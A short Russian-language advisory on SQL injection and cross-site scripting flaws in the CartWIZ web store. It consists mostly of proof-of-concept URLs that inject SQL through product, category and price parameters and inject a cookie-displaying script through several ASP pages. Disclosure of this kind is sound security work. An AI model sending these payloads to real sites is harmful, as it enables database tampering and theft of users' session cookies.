Программа: CartWIZ 

Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных уязвимого приложения.

1. SQL-инъекция возможна из-за недостаточной обработки входных данных в нескольких сценариях. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. 

Примеры: 

http://[target]/cartWiz/store/addToCart.asp? idProduct=’SQL_INJECTION &quantity=1 

http://[target]/cartwiz/store/productDetails.asp? idProduct=’SQL%20INJECTION

http://[target]/cartwiz/store/searchResults.asp? name=&idCategory=&sku=&price
From=0& priceTo=’SQL INJECTION&validate=1

http://[target]/cartwiz/store/searchResults.asp? name=&idCategory=&sku=&priceFrom=’
SQL INJECTION&priceTo=9999999999&validate=1

http://[target]/cartwiz/store/searchResults.asp? name=&idCategory=’SQL INJECTION&sku
=&priceFrom=0&priceTo=9999999999&validate=1 

2. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. 

Примеры: 

http://[target]/cartwiz/store/tellAFriend.asp? idProduct=’"><script>alert(document.cookie)</script> 

http://[target]/cartwiz/store/addToWishlist.asp? idProduct=’"><script>alert(document.cookie)</script>

http://[target]/cartwiz/store/acces s.asp?redirect=’"> <script>alert(document.cookie)</script>

http://[target]/cartWiz/store/error.asp?message=’"> <script>alert(document.cookie)</script>

http://[target] /cartwiz/store/login.asp?message= Please+login+using+the+form+above+to+access
+your+account.&redirect='»><script>alert (document.cookie)</script>

http://[target]/cartwiz/store/login.asp?mess age=’"> < script>alert(document.cookie)</script>&redirect=

http://[target]/cartwiz/store/searchResults.asp?name= & idCategory=&sku=’%22%3E%3Cscript%3Ealert
(document.cookie )%3C/script%3E&priceFrom=0&pr

http://[target]/cartwiz/store/searchResults.asp?name=’"> <script>alert(document.cookie)</script>&idCategory
=&sku=&priceFrom=

Оставить мнение